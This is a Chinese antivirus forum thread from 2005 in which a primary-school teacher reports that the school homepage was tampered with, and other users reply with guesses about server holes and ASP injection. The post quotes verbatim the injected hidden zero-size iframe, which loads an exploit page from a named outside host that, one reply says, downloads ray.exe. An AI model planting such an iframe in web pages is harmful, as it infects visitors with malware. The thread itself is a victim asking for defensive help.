瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 学校的网站首页被用iframe语句嵌入它的带有木马的网页!

1   1  /  1  页   跳转

学校的网站首页被用iframe语句嵌入它的带有木马的网页!

学校的网站首页被用iframe语句嵌入它的带有木马的网页!

本人是一小学教师,个人爱好自学为学校做了个校园网,平时也能手动清除一些常见病毒。
但前几天进入学校网站瑞星实时监控拦截了一个病毒,
文件路径:C:\Documents Settings\Administrator\Local Settings\Temprary Internet files
病毒来源:本机    病毒名称:Exploit.HTML.mht.bb
我查看了网页的源代码,发现多了一些代码,如下:
<iframe src="http://web.163.sh.cn/~ling520/sp2/sp2.htm" width="0" height="0" frameborder="0"></iframe>
打开学校网站的同时也打开了它带有木马的网页,而且设置为不可见(width="0" height="0")
手动清毒后,我重新上传了首页。问题得到解决。

这已经是第二次了,上一次好象是好多个月之前或是一年前?(记不得了)
是我机子中毒了,才会这样呢,还是这个该死的人利用网站什么漏洞进入网面进行更改,还是用什么工具进入注入?
我总得预防吧,不然老是出现这种情况,万一哪些缺乏病毒知识又没装杀毒软件和防火墙的人进入校园网中了毒,那我不成罪魁祸首了啊。
注:学校网站空间挂在市教育上,我的网页都是htm,留言本是网上下载的asp。
最后编辑2005-08-26 18:44:49
分享到:
gototop
 

【整理】预防恶意网页的一些建议 解除恶意修改的一些方法
                  http://forum.ikaka.com/topic.asp?board=67&artid=5939356
gototop
 

教育网,也就是说你们的所有的计算机都在一个大城域网中,你们所有的ip段都基本上属于172.1x.x.xxx?这种情况的话,最好给自己的服务器设上权限,一般这种情况都是直接进入你的服务器的可能性比较大,获得了administrator的权限,什么不能做?还是从自己这方面想想服务器在设置上是否存在漏洞吧?好像没有人会拿小学网站开刀吧?
gototop
 

你好,
建议要公安机关介入调查
gototop
 

呵,谢谢大家的意见!
回复1楼:预防恶意网页的一些建议 解除恶意修改的一些方法
这方面知识我是了解,但它是针对本机网页病毒,应该跟我提到的有所不同吧?我是弄不懂它是怎么在网页中注入<iframe>
回复2楼:我们小学和教育局是分开的,我们学校用ADSL、路由器和交换机组成的局域网,跟这方面没关系的吧。教育局那边的服务器我就不清楚了,他们只提供一个用户名和密码,我这边只能上传网页文件到他指定的路径。
回复3楼:我也想,不过呵。。。
我搜了很多这个病毒:Exploit.HTML.mht,看来很多网站都有这种情况,不过都没有解决方案啊?
版主和各位大虾们,能不能介绍这方面的话题,也把这个解决方案罗列出来,加到精华里去,方便网站管理员,这种情况还是挺普遍的,不信去搜一下这方面的。。。
gototop
 

服务器可能某些端口被人利用入侵,或者asp含有注入漏洞,被人注入取得权限,因此被修改了网页。
检查了http://web.163.sh.cn/~ling520/sp2/sp2.htm这个网页,会下载一个叫ray.exe的文件,比较新的东西。
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT